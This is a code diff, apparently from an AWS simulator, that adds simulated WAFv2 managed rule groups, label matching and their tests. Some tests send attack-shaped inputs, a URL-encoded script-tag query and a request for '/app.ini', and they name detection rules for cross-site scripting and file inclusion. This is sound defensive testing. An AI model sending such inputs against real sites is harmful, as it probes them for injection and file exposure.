+    assertArrayEquals(decision.labels, [
+      "awswaf:managed:aws:known-bad-inputs:Propfind_Method",
+      "awswaf:managed:aws:admin-protection:AdminProtection_URIPath",
+    ]);
+  });
+
+  it("refuses a managed rule group that is not simulated", async () => {
+    // Given a web ACL naming the bot control group, which decides by behaviour
+    // across requests.
+    const waf = new SimAws().wafV2();
+
+    // When it is created.
+    const error = await assertThrowsErrorAsync(async () => {
+      await simWafWebAclDecisions(waf, [
+        blockingGroup("AWSManagedRulesBotControlRuleSet"),
+      ]);
+    });
+
+    // Then it is refused by name, and the refusal says which groups are
+    // simulated rather than leaving a reader to try them.
+    assertInstanceOf(error, SimWafUnsimulatedInputException);
+    assertStringIncludes(error.message, "AWSManagedRulesBotControlRuleSet");
+    assertStringIncludes(error.message, coreRuleSet);
+    assertStringIncludes(error.message, knownBadInputs);
+    assertStringIncludes(error.message, adminProtection);
+  });
+
+  it("refuses a rule group from another vendor", async () => {
+    // Given a web ACL naming a marketplace group under the core rule set name.
+    const waf = new SimAws().wafV2();
+
+    // When it is created.
+    const error = await assertThrowsErrorAsync(async () => {
+      await simWafWebAclDecisions(waf, [
+        {
+          ...simWafManagedRuleFactory.make({ Name: "managed" }),
+          Statement: {
+            ManagedRuleGroupStatement: {
+              VendorName: "Fortinet",
+              Name: coreRuleSet,
+            },
+          },
+        },
+      ]);
+    });
+
+    // Then it is refused: a subscription buys rules nobody outside the vendor
+    // has seen.
+    assertStringIncludes(error.message, "Fortinet");
+  });
+
+  it("reports what it covers of every rule it carries", () => {
+    // Given a simulated WAFv2.
+    const waf = new SimAws().wafV2();
+
+    // When the managed rules are asked what they cover.
+    const rules = waf.managedRules().rules();
+    const declared = rules.filter((rule) => rule.tier === "declared");
+
+    // Then every rule of the three groups is reported with its group, its
+    // label and its tier, and the rules that detect nothing are the four that
+    // run AWS's own cross-site scripting detection.
+    assertArrayLength(rules, 34);
+    assertArrayEquals(
+      declared.map((rule) => rule.name),
+      [
+        "CrossSiteScripting_COOKIE",
+        "CrossSiteScripting_QUERYARGUMENTS",
+        "CrossSiteScripting_BODY",
+        "CrossSiteScripting_URIPATH",
+      ],
+    );
+    assertIdentical(waf.managedRules().tierOf("NoUserAgent_HEADER"), "exact");
+    assertIdentical(
+      waf.managedRules().tierOf("GenericLFI_URIPATH"),
+      "documented",
+    );
+    assertTrue(
+      rules.every((rule) => rule.label.startsWith("awswaf:managed:aws:")),
+    );
+  });
+
+  it("blocks a request a test declared a match for", async () => {
+    // Given the core rule set, and a test that says the cross-site scripting
+    // rule claims one path. AWS documents none of that detection, so nothing
+    // here would find the payload on its own.
+    const waf = new SimAws().wafV2();
+    const decide = await simWafWebAclDecisions(waf, [
+      blockingGroup(coreRuleSet),
+    ]);
+
+    waf.managedRules().onRequest("/search", {
+      matches: ["CrossSiteScripting_QUERYARGUMENTS"],
+    });
+
+    // When a request to that path is evaluated, and one to another path.
+    const attack = decide(
+      simWafBrowserRequest("https://example.test/search?q=%3Cscript%3E"),
+    );
+    const ordinary = decide(
+      simWafBrowserRequest("https://example.test/results?q=%3Cscript%3E"),
+    );
+
+    // Then the declared match blocked through the rule it named, and the same
+    // payload elsewhere went through.
+    assertIdentical(attack.action, "BLOCK");
+    assertArrayEquals(attack.labels, [
+      "awswaf:managed:aws:core-rule-set:CrossSiteScripting_QueryArguments",
+    ]);
+    assertIdentical(ordinary.action, "ALLOW");
+  });
+
+  it("refuses a match declared against a rule no group holds", () => {
+    // Given a simulated WAFv2.
+    const waf = new SimAws().wafV2();
+
+    // When a match is declared against a rule name that is not in any group.
+    const error = assertThrowsError(() => {
+      waf.managedRules().onRequest("/search", {
+        matches: ["CrossSiteScripting_QueryArguments"],
+      });
+    });
+
+    // Then it is refused where the declaration was written, rather than
+    // sitting there matching nothing. The rule names are AWS's own, and the
+    // label spelling is not one of them.
+    assertInstanceOf(error, SimWafDeclarationError);
+    assertStringIncludes(error.message, "CrossSiteScripting_QueryArguments");
+  });
+
+  it("refuses a match declared for no path", () => {
+    // Given a simulated WAFv2.
+    const waf = new SimAws().wafV2();
+
+    // When a match is declared with no path to declare it for.
+    const error = assertThrowsError(() => {
+      waf.managedRules().onRequest("", { matches: ["PROPFIND_METHOD"] });
+    });
+
+    // Then it is refused: a path is what the declaration is matched by.
+    assertInstanceOf(error, SimWafDeclarationError);
+  });
+});

--- a/src/service/wafv2/managed/sim-waf-managed-rule-groups.ts
+++ b/src/service/wafv2/managed/sim-waf-managed-rule-groups.ts
@@ -1,0 +1,82 @@
+import { simWafAdminProtectionRuleSet } from "./group/sim-waf-admin-protection.js";
+import { simWafCommonRuleSet } from "./group/sim-waf-common-rule-set.js";
+import { simWafKnownBadInputsRuleSet } from "./group/sim-waf-known-bad-inputs.js";
+import type {
+  SimWafManagedRuleDefinition,
+  SimWafManagedRuleGroupDefinition,
+} from "./sim-waf-managed-rule.type.js";
+
+/**
+ * The vendor the simulated managed rule groups belong to.
+ *
+ * A group from any other vendor is refused, marketplace groups included: a
+ * subscription buys rules nobody outside the vendor has ever seen.
+ */
+export const simWafManagedVendorName = "AWS";
+
+const groups: readonly SimWafManagedRuleGroupDefinition[] = [
+  simWafCommonRuleSet,
+  simWafKnownBadInputsRuleSet,
+  simWafAdminProtectionRuleSet,
+];
+
+const byName = new Map(groups.map((group) => [group.name, group]));
+
+/**
+ * One rule and the group it belongs to.
+ */
+export interface SimWafManagedRuleEntry {
+  readonly group: SimWafManagedRuleGroupDefinition;
+  readonly rule: SimWafManagedRuleDefinition;
+}
+
+const rulesByName = new Map<string, SimWafManagedRuleEntry>(
+  groups.flatMap((group) =>
+    group.rules.map((rule) => [rule.name, { group, rule }] as const),
+  ),
+);
+
+/**
+ * Find a simulated managed rule group by vendor and name.
+ */
+export function findSimWafManagedRuleGroup(
+  vendorName: string | undefined,
+  name: string | undefined,
+): SimWafManagedRuleGroupDefinition | undefined {
+  return vendorName === simWafManagedVendorName && name !== undefined
+    ? byName.get(name)
+    : undefined;
+}
+
+/**
+ * The groups that are simulated, named as a refusal names them.
+ */
+export function simWafManagedRuleGroupNames(): readonly string[] {
+  return groups.map((group) => group.name);
+}
+
+/**
+ * Find one managed rule by name, wherever it lives.
+ *
+ * Rule names are unique across the simulated groups, which is what lets a
+ * declared match and an action override name a rule and nothing else.
+ */
+export function findSimWafManagedRule(
+  name: string,
+): SimWafManagedRuleEntry | undefined {
+  return rulesByName.get(name);
+}
+
+/**
+ * Every rule of every simulated group, in the order the groups evaluate them.
+ */
+export function allSimWafManagedRules(): readonly SimWafManagedRuleEntry[] {
+  return rulesByName.values().toArray();
+}
+
+/**
+ * The fully qualified name of the label one rule adds.
+ */
+export function simWafManagedRuleLabel(entry: SimWafManagedRuleEntry): string {
+  return `${entry.group.labelNamespace}:${entry.rule.label}`;
+}

--- a/src/service/wafv2/managed/sim-waf-managed-rule-overrides.ts
+++ b/src/service/wafv2/managed/sim-waf-managed-rule-overrides.ts
@@ -1,0 +1,40 @@
+import { invalidSimWafRule } from "../statement/sim-waf-rule-refusals.js";
+import { SimWafAction } from "../web-acl/sim-waf-action.js";
+import type { SimWafCustomResponseBodies } from "../web-acl/sim-waf-custom-response.type.js";
+import type { SimWafManagedRuleGroupStatementInput } from "./sim-waf-managed-group.type.js";
+import { findSimWafManagedRule } from "./sim-waf-managed-rule-groups.js";
+import type { SimWafManagedRuleGroupDefinition } from "./sim-waf-managed-rule.type.js";
+
+/**
+ * Read the actions a rule group statement sets its named rules to.
+ *
+ * An override naming a rule the group does not hold is refused. A typo there
+ * would otherwise leave the rule it meant to set to `Count` still blocking,
+ * which is the failure this whole mechanism exists to avoid.
+ */
+export function simWafManagedRuleOverrides(
+  statement: SimWafManagedRuleGroupStatementInput,
+  group: SimWafManagedRuleGroupDefinition,
+  ruleName: string,
+  bodies: SimWafCustomResponseBodies,
+): ReadonlyMap<string, SimWafAction> {
+  return new Map(
+    (statement.RuleActionOverrides ?? []).map((override) => {
+      const overridden = String(override.Name);
+      const entry = findSimWafManagedRule(overridden);
+
+      if (entry === undefined || entry.group.name !== group.name) {
+        invalidSimWafRule(
+          ruleName,
+          `The rule group ${group.name} holds no rule named ${overridden} ` +
+            `to override`,
+        );
+      }
+
+      return [
+        overridden,
+        SimWafAction.read(override.ActionToUse, ruleName, bodies),
+      ];
+    }),
+  );
+}

--- a/src/service/wafv2/managed/sim-waf-managed-rule-report.ts
+++ b/src/service/wafv2/managed/sim-waf-managed-rule-report.ts
@@ -1,0 +1,34 @@
+import {
+  allSimWafManagedRules,
+  simWafManagedRuleLabel,
+} from "./sim-waf-managed-rule-groups.js";
+import type { SimWafManagedRuleTier } from "./sim-waf-managed-rule.type.js";
+
+/**
+ * What the simulation covers of one managed rule.
+ */
+export interface SimWafManagedRuleReport {
+  readonly group: string;
+  readonly name: string;
+
+  /** The fully qualified label the rule adds to a request it claims. */
+  readonly label: string;
+
+  readonly tier: SimWafManagedRuleTier;
+}
+
+/**
+ * What the simulation covers of every managed rule it carries.
+ *
+ * This is how a reader finds out what a group does here without reading the
+ * source of it, which matters most for the rules that detect less than the AWS
+ * rule they stand for.
+ */
+export function simWafManagedRuleReports(): readonly SimWafManagedRuleReport[] {
+  return allSimWafManagedRules().map((entry) => ({
+    group: entry.group.name,
+    name: entry.rule.name,
+    label: simWafManagedRuleLabel(entry),
+    tier: entry.rule.tier,
+  }));
+}

--- a/src/service/wafv2/managed/sim-waf-managed-rule.type.ts
+++ b/src/service/wafv2/managed/sim-waf-managed-rule.type.ts
@@ -1,0 +1,59 @@
+import type { SimWafManagedRequestParts } from "./sim-waf-managed-request.js";
+
+/**
+ * How closely one simulated managed rule follows the AWS rule it stands for.
+ *
+ * AWS publishes every rule name, every default action, every label and the
+ * size limits, and holds back the pattern set behind each rule. What can be
+ * simulated therefore varies by rule, and each one says which it is rather
+ * than leaving a reader to find out from a request that was not blocked.
+ *
+ * - `exact` matches where the AWS rule matches. The condition is documented
+ *   in full, so there is nothing left to approximate.
+ * - `documented` matches the patterns AWS published for the rule and nothing
+ *   beyond them, so it detects less than the AWS rule does.
+ * - `declared` detects nothing at all, and matches only a request a test
+ *   declared a match for. The detection AWS runs is undocumented, and a guess
+ *   at it would block requests AWS allows.
+ */
+export type SimWafManagedRuleTier = "exact" | "documented" | "declared";
+
+/**
+ * Whether one managed rule claims a request.
+ */
+export type SimWafManagedDetector = (
+  parts: SimWafManagedRequestParts,
+) => boolean;
+
+/**
+ * One rule of an AWS managed rule group.
+ *
+ * Every rule in the three simulated groups blocks by default, so the action is
+ * not carried here. A rule with no detector is a declared-only rule.
+ */
+export interface SimWafManagedRuleDefinition {
+  /** The rule name, as AWS names it and as an override names it. */
+  readonly name: string;
+
+  /** The label this rule adds, within its group's namespace. */
+  readonly label: string;
+
+  readonly tier: SimWafManagedRuleTier;
+
+  readonly detects?: SimWafManagedDetector | undefined;
+}
+
+/**
+ * One AWS managed rule group, in the order its rules are evaluated.
+ */
+export interface SimWafManagedRuleGroupDefinition {
+  readonly name: string;
+
+  /** The prefix every label this group adds is qualified by. */
+  readonly labelNamespace: string;
+
+  /** The WCUs the group costs, which `DescribeManagedRuleGroup` reports. */
+  readonly capacity: number;
+
+  readonly rules: readonly SimWafManagedRuleDefinition[];
+}

--- a/src/service/wafv2/managed/sim-waf-managed-rules.ts
+++ b/src/service/wafv2/managed/sim-waf-managed-rules.ts
@@ -1,0 +1,108 @@
+import { SimWafDeclarationError } from "../error/sim-wafv2.error.js";
+import type { SimWafInspectedRequest } from "../evaluate/sim-waf-inspected-request.js";
+import {
+  findSimWafManagedRule,
+  type SimWafManagedRuleEntry,
+} from "./sim-waf-managed-rule-groups.js";
+import {
+  type SimWafManagedRuleReport,
+  simWafManagedRuleReports,
+} from "./sim-waf-managed-rule-report.js";
+
+import type { SimWafManagedRuleTier } from "./sim-waf-managed-rule.type.js";
+
+/**
+ * The managed rules a test says claim a request.
+ */
+export interface SimWafManagedMatchDeclaration {
+  /** The rules that claim the request, by the name AWS gives them. */
+  readonly matches: readonly string[];
+}
+
+const noMatches: ReadonlySet<string> = new Set();
+
+/**
+ * The managed rule matches this simulated WAFv2 answers with, and what it
+ * covers of each rule.
+ *
+ * Most of the managed rules detect for themselves, and this is for the ones
+ * that cannot. The four `CrossSiteScripting_*` rules run detection AWS
+ * documents none of, and the rules in the documented tier match the published
+ * patterns and nothing beyond them, so a test asserting that a payload is
+ * blocked says which rule claims it:
+ *
+ * ```typescript
+ * simAws.wafV2().managedRules().onRequest("/search", {
+ *   matches: ["CrossSiteScripting_QueryArguments"],
+ * });
+ * ```
+ *
+ * A declared match is a match, and everything after it is what the group would
+ * have done anyway: the rule adds its label, an action override applies to it,
+ * and the group blocks by that rule.
+ */
+export class SimWafManagedRules {
+  readonly #byUriPath = new Map<string, ReadonlySet<string>>();
+
+  /**
+   * Declare which managed rules claim a request to one URI path.
+   *
+   * The path is matched exactly, as simulated Rekognition matches the name of
+   * an image a result was declared for. A rule name no simulated group carries
+   * is refused here rather than matching nothing later.
+   */
+  onRequest(uriPath: string, declaration: SimWafManagedMatchDeclaration): void {
+    if (uriPath === "") {
+      throw new SimWafDeclarationError(
+        "A declared managed rule match needs the URI path of the request it " +
+          "is declared for",
+      );
+    }
+
+    this.#byUriPath.set(
+      uriPath,
+      new Set(
+        declaration.matches.map((name) => this.requiredRule(name).rule.name),
+      ),
+    );
+  }
+
+  /**
+   * The rules declared to claim one request.
+   */
+  declaredMatches(request: SimWafInspectedRequest): ReadonlySet<string> {
+    return this.#byUriPath.get(request.uriPath) ?? noMatches;
+  }
+
+  /**
+   * What this simulation covers of one managed rule.
+   */
+  tierOf(ruleName: string): SimWafManagedRuleTier {
+    return this.requiredRule(ruleName).rule.tier;
+  }
+
+  /**
+   * What this simulation covers of every managed rule it carries.
+   *
+   * This is how a reader finds out what a group does here without reading the
+   * source of it, which matters most for the rules that detect less than the
+   * AWS rule they stand for.
+   */
+  rules(): readonly SimWafManagedRuleReport[] {
+    return simWafManagedRuleReports();
+  }
+
+  private requiredRule(ruleName: string): SimWafManagedRuleEntry {
+    const entry = findSimWafManagedRule(ruleName);
+
+    if (entry === undefined) {
+      throw new SimWafDeclarationError(
+        `No simulated AWS managed rule group holds a rule named ` +
+          `${ruleName}. The rules that are simulated are reported by ` +
+          `managedRules().rules().`,
+      );
+    }
+
+    return entry;
+  }
+}

--- a/src/service/wafv2/sdk/sim-wafv2-sdk-command-router.ts
+++ b/src/service/wafv2/sdk/sim-wafv2-sdk-command-router.ts
@@ -55,6 +55,14 @@ export class SimWafSdkCommandRouter implements SimSdkCommandRouter {
           ),
       ],
       [
+        "DescribeManagedRuleGroupCommand",
+        async (command, context): Promise<unknown> =>
+          await simWaf.describeManagedRuleGroup(
+            command as simWafCommands.SimDescribeManagedRuleGroupCommand,
+            simSdkCallerOptions(context),
+          ),
+      ],
+      [
         "CreateIPSetCommand",
         async (command, context): Promise<unknown> =>
           await simWaf.createIpSet(

--- a/src/service/wafv2/sim-wafv2-commands.ts
+++ b/src/service/wafv2/sim-wafv2-commands.ts
@@ -10,9 +10,11 @@ import {
 } from "../iam/authorize/sim-iam-inter-service-auth-z.js";
 import { SimWafAuthorizer } from "./command/authorize/sim-wafv2-authorizer.js";
 import { SimWafIpSetCommands } from "./command/ip-set/sim-wafv2-ip-set-commands.js";
+import { SimWafManagedRuleGroupCommands } from "./command/managed-rule-group/sim-wafv2-managed-rule-group-commands.js";
 import { SimWafRegexPatternSetCommands } from "./command/regex-pattern-set/sim-wafv2-regex-pattern-set-commands.js";
 import { SimWafWebAclCommands } from "./command/web-acl/sim-wafv2-web-acl-commands.js";
 import type { SimWafIpSet } from "./ip-set/sim-waf-ip-set.js";
+import { SimWafManagedRules } from "./managed/sim-waf-managed-rules.js";
 import type { SimWafRegexPatternSet } from "./regex-pattern-set/sim-waf-regex-pattern-set.js";
 import { SimWafResourceStore } from "./resource/sim-waf-resource-store.js";
 import type { SimWafWebAcl } from "./web-acl/sim-waf-web-acl.js";
@@ -38,7 +40,10 @@ export class SimWafCommands {
     "regex pattern set",
   );
 
+  readonly managedRules = new SimWafManagedRules();
+
   readonly webAclCommands: SimWafWebAclCommands;
+  readonly managedRuleGroupCommands: SimWafManagedRuleGroupCommands;
   readonly ipSetCommands: SimWafIpSetCommands;
   readonly regexPatternSetCommands: SimWafRegexPatternSetCommands;
   readonly background: BackgroundScheduler;
@@ -56,6 +61,11 @@ export class SimWafCommands {
     this.webAclCommands = new SimWafWebAclCommands({
       webAcls: this.webAcls,
       regexPatternSets: this.regexPatternSets,
+      managedRules: this.managedRules,
+      authorizer,
+      accountRegionScope,
+    });
+    this.managedRuleGroupCommands = new SimWafManagedRuleGroupCommands({
       authorizer,
       accountRegionScope,
     });

--- a/src/service/wafv2/sim-wafv2-refusals.iso.test.ts
+++ b/src/service/wafv2/sim-wafv2-refusals.iso.test.ts
@@ -106,28 +106,19 @@ describe("SimWafV2 refusals", () => {
     assertStringIncludes(xss.message, "XssMatchStatement");
   });
 
-  it("refuses the rule group statements", async () => {
-    // When a rule refers to a managed or customer rule group, or to a label
-    // one of them would have added.
-    const managed = await refusalForStatement({
-      ManagedRuleGroupStatement: {
-        VendorName: "AWS",
-        Name: "AWSManagedRulesCommonRuleSet",
-      },
-    });
-    const group = await refusalForStatement({
+  it("refuses a rule group of the reader's own", async () => {
+    // When a rule refers to a rule group the reader wrote.
+    const error = await refusalForStatement({
       RuleGroupReferenceStatement: {
         ARN: "arn:aws:wafv2:eu-west-2:111111111111:regional/rulegroup/x/y",
       },
     });
-    const label = await refusalForStatement({
-      LabelMatchStatement: { Scope: "LABEL", Key: "awswaf:managed:aws:x" },
-    });
 
-    // Then each is refused by name.
-    assertStringIncludes(managed.message, "ManagedRuleGroupStatement");
-    assertStringIncludes(group.message, "RuleGroupReferenceStatement");
-    assertStringIncludes(label.message, "LabelMatchStatement");
+    // Then it is refused by name: a rule group is a resource in its own right,
+    // and none is simulated. The AWS managed groups are, and they are named in
+    // a statement rather than created.
+    assertInstanceOf(error, SimWafUnsimulatedInputException);
+    assertStringIncludes(error.message, "RuleGroupReferenceStatement");
   });
 
   it("refuses a field to match this simulation does not read", async () => {
@@ -201,20 +192,6 @@ describe("SimWafV2 refusals", () => {
     // send the token back.
     assertStringIncludes(captcha.message, "Captcha");
     assertStringIncludes(challenge.message, "Challenge");
-  });
-
-  it("refuses a rule carrying labels nothing can read", async () => {
-    // When a rule adds a label.
-    const error = await refusalForRule(
-      simWafRuleFactory.make({
-        Name: "the-rule",
-        RuleLabels: [{ Name: "internal" }],
-      }),
-    );
-
-    // Then it is refused, because LabelMatchStatement arrives with the managed
-    // rule groups and nothing here would read the label.
-    assertStringIncludes(error.message, "RuleLabels");
   });
 
   it("refuses a web ACL member this simulation does not model", async () => {

--- a/src/service/wafv2/sim-wafv2.fixture.ts
+++ b/src/service/wafv2/sim-wafv2.fixture.ts
@@ -4,7 +4,9 @@ import type {
   SimCreateWebAclCommandInput,
   SimWafSummaryOutput,
 } from "./command/web-acl/web-acl.command.js";
+import type { SimWafDecision } from "./evaluate/sim-waf-decision.js";
 import type { SimWafStatementInput } from "./statement/sim-waf-statement.type.js";
+import type { SimWafRuleInput } from "./web-acl/sim-waf-rule.type.js";
 import type { SimWafV2 } from "./sim-wafv2.js";
 import { simWafRuleFactory } from "./web-acl/sim-waf-rule.factory.js";
 
@@ -61,3 +63,57 @@ export async function simWafStatementMatches(
   return (request, body): boolean =>
     simWaf.evaluateRequest({ webAclArn, request, body }).action === "BLOCK";
 }
+
+/**
+ * What a web ACL decided about one request.
+ */
+export type SimWafRequestDecision = (
+  request: Request,
+  body?: Uint8Array,
+) => SimWafDecision;
+
+/**
+ * Create a web ACL holding some rules, and answer with a way to put requests
+ * through it.
+ *
+ * This is `simWafStatementMatches` for a test that wants the whole decision
+ * rather than whether one statement claimed the request: which rule decided,
+ * which rules counted, and what labels the request came away with.
+ */
+export async function simWafWebAclDecisions(
+  simWaf: SimWafV2,
+  rules: readonly SimWafRuleInput[],
+  webAcl: Partial<SimCreateWebAclCommandInput> = {},
+): Promise<SimWafRequestDecision> {
+  const { ARN: webAclArn } = await createSimWafWebAcl(simWaf, {
+    ...simWafCreateWebAclFactory.make(),
+    ...webAcl,
+    Rules: rules,
+  });
+
+  return (request, body): SimWafDecision =>
+    simWaf.evaluateRequest({ webAclArn, request, body });
+}
+
+/**
+ * A request the core rule set does not claim on sight.
+ *
+ * `NoUserAgent_HEADER` blocks a request that sends no User-Agent header, and
+ * nothing here sends one unless it is asked to, so a test about any other rule
+ * makes its requests with this.
+ */
+export function simWafBrowserRequest(
+  url: string,
+  init: RequestInit = {},
+): Request {
+  const headers = new Headers(init.headers);
+
+  if (!headers.has("user-agent")) {
+    headers.set("user-agent", browserUserAgent);
+  }
+
+  return new Request(url, { ...init, headers });
+}
+
+const browserUserAgent =
+  "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36";

--- a/src/service/wafv2/sim-wafv2.ts
+++ b/src/service/wafv2/sim-wafv2.ts
@@ -3,7 +3,9 @@ import type * as simWafCommands from "./command/sim-wafv2-command.types.js";
 import type { SimWafRequestOptions } from "./command/sim-wafv2-request-options.js";
 import { SimWafNonexistentItemException } from "./error/sim-wafv2.error.js";
 import type { SimWafDecision } from "./evaluate/sim-waf-decision.js";
+import type { SimWafEvaluationRequest } from "./evaluate/sim-waf-evaluation-request.js";
 import { simWafInspectedRequest } from "./evaluate/sim-waf-inspected-request.js";
+import type { SimWafManagedRules } from "./managed/sim-waf-managed-rules.js";
 import type { SimWafScope } from "./scope/sim-waf-scope.js";
 import { SimWafSdkCommandRouter } from "./sdk/sim-wafv2-sdk-command-router.js";
 import {
@@ -12,21 +14,7 @@ import {
 } from "./sim-wafv2-commands.js";
 import type { SimWafWebAcl } from "./web-acl/sim-waf-web-acl.js";
 
-/**
- * What a web ACL is asked to decide about.
- */
-export interface SimWafEvaluationRequest {
-  /** The web ACL to evaluate against, by ARN. */
-  readonly webAclArn: string;
-
-  readonly request: Request;
-
-  /**
-   * The request body, when the rules might inspect it. A request body is a
-   * stream that cannot be read twice, so it is passed in already buffered.
-   */
-  readonly body?: Uint8Array | undefined;
-}
+export type { SimWafEvaluationRequest } from "./evaluate/sim-waf-evaluation-request.js";
 
 /**
  * Simulated AWS WAFv2. Handles SDK commands. Emulates AWS behaviour and state.
@@ -95,6 +83,17 @@ export class SimWafV2 {
   }
 
   /**
+   * What the AWS managed rule groups do here, and what a test declares of
+   * them.
+   *
+   * `onRequest` says which rules claim a request, for the ones that detect
+   * nothing here, and `rules()` reports what is covered of each.
+   */
+  managedRules(): SimWafManagedRules {
+    return this.#commands.managedRules;
+  }
+
+  /**
    * Handle a CreateWebACL Command from the SDK.
    */
   async createWebAcl(
@@ -147,6 +146,20 @@ export class SimWafV2 {
   ): Promise<simWafCommands.SimDeleteWebAclCommandOutput> {
     await this.#commands.background.sequence();
     return this.#commands.webAclCommands.deleteWebAcl(command, options);
+  }
+
+  /**
+   * Handle a DescribeManagedRuleGroup Command from the SDK.
+   */
+  async describeManagedRuleGroup(
+    command: simWafCommands.SimDescribeManagedRuleGroupCommand,
+    options?: SimWafRequestOptions,
+  ): Promise<simWafCommands.SimDescribeManagedRuleGroupCommandOutput> {
+    await this.#commands.background.sequence();
+    return this.#commands.managedRuleGroupCommands.describeManagedRuleGroup(
+      command,
+      options,
+    );
   }
 
   /**

--- a/src/service/wafv2/statement/sim-waf-label-match.iso.test.ts
+++ b/src/service/wafv2/statement/sim-waf-label-match.iso.test.ts
@@ -1,0 +1,191 @@
+import {
+  assertArrayEquals,
+  assertIdentical,
+  assertInstanceOf,
+  assertStringIncludes,
+  assertThrowsErrorAsync,
+} from "@kensio/smartass";
+import { describe, it } from "vitest";
+
+import { SimAws } from "../../aws/sim-aws.js";
+import { SimWafInvalidParameterException } from "../error/sim-wafv2.error.js";
+import {
+  simWafBrowserRequest,
+  simWafWebAclDecisions,
+} from "../sim-wafv2.fixture.js";
+import { simWafManagedRuleFactory } from "../web-acl/sim-waf-rule.factory.js";
+import { simWafRuleFactory } from "../web-acl/sim-waf-rule.factory.js";
+import type { SimWafRuleInput } from "../web-acl/sim-waf-rule.type.js";
+import type { SimWafStatementInput } from "./sim-waf-statement.type.js";
+
+/**
+ * A rule that claims requests to one path and labels them.
+ */
+function labelling(
+  name: string,
+  priority: number,
+  path: string,
+  labels: readonly string[],
+): SimWafRuleInput {
+  return {
+    ...simWafRuleFactory.make({ Name: name, Priority: priority }),
+    Action: { Count: {} },
+    RuleLabels: labels.map((label) => ({ Name: label })),
+    Statement: {
+      ByteMatchStatement: {
+        SearchString: path,
+        PositionalConstraint: "STARTS_WITH",
+        FieldToMatch: { UriPath: {} },
+        TextTransformations: [{ Priority: 0, Type: "NONE" }],
+      },
+    },
+  };
+}
+
+/**
+ * A rule that blocks whatever a label match claims.
+ */
+function blockingOn(
+  priority: number,
+  statement: SimWafStatementInput,
+): SimWafRuleInput {
+  return {
+    ...simWafRuleFactory.make({ Name: "block-labelled", Priority: priority }),
+    Action: { Block: {} },
+    Statement: statement,
+  };
+}
+
+describe("SimWafV2 label matching", () => {
+  it("blocks on a label an earlier rule added", async () => {
+    // Given a rule that labels the requests it counts, and a rule after it
+    // that blocks on the label.
+    const decide = await simWafWebAclDecisions(new SimAws().wafV2(), [
+      labelling("watch-admin", 0, "/admin", ["internal-only"]),
+      blockingOn(1, {
+        LabelMatchStatement: { Scope: "LABEL", Key: "internal-only" },
+      }),
+    ]);
+
+    // When a labelled request is evaluated, and one the first rule did not
+    // claim.
+    const labelled = decide(simWafBrowserRequest("https://example.test/admin"));
+    const other = decide(simWafBrowserRequest("https://example.test/pricing"));
+
+    // Then the label decided the first and the second went through. A label a
+    // rule of the web ACL's own adds carries no prefix, which is what the key
+    // is written to match.
+    assertIdentical(labelled.action, "BLOCK");
+    assertIdentical(labelled.terminatingRuleName, "block-labelled");
+    assertArrayEquals(labelled.labels, ["internal-only"]);
+    assertIdentical(other.action, "ALLOW");
+  });
+
+  it("reads only the labels the rules before it added", async () => {
+    // Given a rule that blocks on a label, ahead of the rule that adds it.
+    const decide = await simWafWebAclDecisions(new SimAws().wafV2(), [
+      blockingOn(0, {
+        LabelMatchStatement: { Scope: "LABEL", Key: "internal-only" },
+      }),
+      labelling("watch-admin", 1, "/admin", ["internal-only"]),
+    ]);
+
+    // When a request the labelling rule claims is evaluated.
+    const decision = decide(simWafBrowserRequest("https://example.test/admin"));
+
+    // Then it went through. Labels arrive as rules run, so a rule at a lower
+    // priority than the one that labels a request never sees the label.
+    assertIdentical(decision.action, "ALLOW");
+    assertArrayEquals(decision.labels, ["internal-only"]);
+  });
+
+  it("blocks on any label a managed rule group added", async () => {
+    // Given the core rule set counting rather than blocking, and a rule after
+    // it that blocks on anything the group claimed. This is the pattern teams
+    // tune a managed group with.
+    const decide = await simWafWebAclDecisions(new SimAws().wafV2(), [
+      {
+        ...simWafManagedRuleFactory.make({ Name: "core", Priority: 0 }),
+        OverrideAction: { Count: {} },
+      },
+      blockingOn(1, {
+        LabelMatchStatement: {
+          Scope: "NAMESPACE",
+          Key: "awswaf:managed:aws:core-rule-set:",
+        },
+      }),
+    ]);
+
+    // When a request the group claims is evaluated, and one it does not.
+    const claimed = decide(
+      simWafBrowserRequest("https://example.test/app.ini"),
+    );
+    const ordinary = decide(simWafBrowserRequest("https://example.test/app"));
+
+    // Then the reader's own rule is what blocked, from a label the group left
+    // behind rather than from a rule of the group's.
+    assertIdentical(claimed.action, "BLOCK");
+    assertIdentical(claimed.terminatingRuleName, "block-labelled");
+    assertIdentical(ordinary.action, "ALLOW");
+  });
+
+  it("reads a namespace written without its trailing colon", async () => {
+    // Given a rule blocking on a namespace key that stops short of the colon.
+    const decide = await simWafWebAclDecisions(new SimAws().wafV2(), [
+      {
+        ...simWafManagedRuleFactory.make({ Name: "core", Priority: 0 }),
+        OverrideAction: { Count: {} },
+      },
+      blockingOn(1, {
+        LabelMatchStatement: {
+          Scope: "NAMESPACE",
+          Key: "awswaf:managed:aws:core-rule-set",
+        },
+      }),
+    ]);
+
+    // When a request the group claims is evaluated.
+    const decision = decide(
+      simWafBrowserRequest("https://example.test/app.ini"),
+    );
+
+    // Then the key is read as the namespace it names, so a group whose name
+    // merely started the same way would not be matched by it.
+    assertIdentical(decision.action, "BLOCK");
+  });
+
+  it("refuses a label match with nothing to match", async () => {
+    // When a label match names no key, and when it names a scope that is
+    // neither of the two.
+    const noKey = await assertThrowsErrorAsync(async () => {
+      await simWafWebAclDecisions(new SimAws().wafV2(), [
+        blockingOn(0, { LabelMatchStatement: { Scope: "LABEL" } }),
+      ]);
+    });
+    const badScope = await assertThrowsErrorAsync(async () => {
+      await simWafWebAclDecisions(new SimAws().wafV2(), [
+        blockingOn(0, {
+          LabelMatchStatement: { Scope: "PREFIX", Key: "internal-only" },
+        }),
+      ]);
+    });
+
+    // Then each is refused where the rule was written.
+    assertInstanceOf(noKey, SimWafInvalidParameterException);
+    assertStringIncludes(noKey.message, "Key");
+    assertStringIncludes(badScope.message, "LABEL or NAMESPACE");
+  });
+
+  it("refuses a rule label with no name", async () => {
+    // When a rule adds a label that names nothing.
+    const error = await assertThrowsErrorAsync(async () => {
+      await simWafWebAclDecisions(new SimAws().wafV2(), [
+        { ...labelling("watch-admin", 0, "/admin", []), RuleLabels: [{}] },
+      ]);
+    });
+
+    // Then it is refused, rather than labelling requests with nothing.
+    assertInstanceOf(error, SimWafInvalidParameterException);
+    assertStringIncludes(error.message, "watch-admin");
+  });
+});

--- a/src/service/wafv2/statement/sim-waf-label-match.ts
+++ b/src/service/wafv2/statement/sim-waf-label-match.ts
